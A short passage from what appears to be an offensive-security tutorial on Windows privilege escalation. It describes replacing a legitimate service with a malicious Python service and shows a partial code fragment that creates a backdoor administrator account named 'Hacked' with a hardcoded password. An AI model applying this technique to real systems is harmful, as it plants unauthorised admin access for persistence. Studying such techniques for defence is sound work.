In our previous section, we created a malicious Python service and replaced the legitimate one with it. Once the system has started, we verified that we get a system or admin privilege. Now, in this section, we'll see how we can create a new admin account and then jump from the standard user to the admin account. So, what I have changed on the coding part is adding the following section to the previous code, which in summary will create a new admin account once the service gets started:
... USER = "Hacked" GROUP = "Administrators" user_info = dict ( # create a user info profile in a dictionary format name = USER, password = "python_is_my_life", # Define the password for the 'hacked' username priv = win32netcon.USER_PRIV_USER, home_dir = None, comment = None, flags = win32netcon.UF_SCRIPT, ...